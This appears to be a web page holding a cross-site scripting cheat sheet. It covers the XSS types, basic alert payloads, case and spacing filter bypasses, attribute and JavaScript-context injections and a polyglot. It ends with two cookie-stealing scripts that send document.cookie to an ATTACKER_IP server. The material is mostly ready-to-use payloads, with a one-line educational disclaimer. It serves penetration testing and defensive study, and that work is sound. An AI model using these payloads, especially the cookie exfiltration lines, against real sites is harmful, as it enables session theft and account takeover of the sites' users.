Cross-Site Scripting (XSS)
Types of XSS
Section titled “Types of XSS”| Type | Description |
|---|---|
| Reflected | Malicious script is reflected off the web application to the victim’s browser. (Requires user to click a link) |
| Stored | Malicious script is permanently stored on the target server (e.g., database). (Victim loads the infected page) |
| DOM-based | Vulnerability exists in client-side code rather than server-side code. |
Basic Payloads
Section titled “Basic Payloads”Simple checks to verify XSS vulnerability.
| Payload | Context |
|---|---|
<script>alert(1)</script> | Standard script tag |
<script>confirm('XSS')</script> | Standard confirm dialog |
<script>prompt('XSS')</script> | Standard prompt dialog |
<img src=x onerror=alert(1)> | Image tag with invalid source triggers error |
<svg onload=alert(1)> | SVG on load event |
<body onload=alert(1)> | Body on load event |
<iframe src="javascript:alert(1)"> | Iframe javascript protocol |
Filter Bypasses
Section titled “Filter Bypasses”Case Insensitive & Spacing
Section titled “Case Insensitive & Spacing”| Payload | Description |
|---|---|
<ScRiPt>alert(1)</sCrIpT> | Mixed case to bypass exact match |
<img src=x onerror = alert(1)> | Add spaces around equals |
<svg/onload=alert(1)> | Use slash instead of space |
Attribute Injection
Section titled “Attribute Injection”If input is inside a tag: <input value="USER_INPUT">
| Payload | Resulting HTML |
|---|---|
"><script>alert(1)</script> | Closes tag and starts new script |
" onmouseover="alert(1) | Injects event handler attribute |
" autofocus onfocus="alert(1) | Auto triggers focus event |
JavaScript Context
Section titled “JavaScript Context”If input is inside a script: <script>var x = 'USER_INPUT';</script>
| Payload | Resulting JS |
|---|---|
';alert(1);// | Closes string, injects alert, comments out rest |
'-alert(1)-' | Arithmetic operation executes function |
Polyglots
Section titled “Polyglots”Payloads designed to work in multiple contexts (HTML, attribute, script).
javascript://%250Aalert(1)//" autofocus onfocus=alert(1) src=1 onerror=alert(1) type=image/svg+xml onload=alert(1)jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3eCookie Stealing
Section titled “Cookie Stealing”Send victim’s cookies to attacker’s server (RequestBin / Burp Collaborator).
<script> fetch('http://ATTACKER_IP/?cookie=' + btoa(document.cookie));</script><script> new Image().src="http://ATTACKER_IP/?c="+document.cookie;</script>⚠️ Educational Purpose Only. Use these payloads only on systems you own or have explicit permission to test.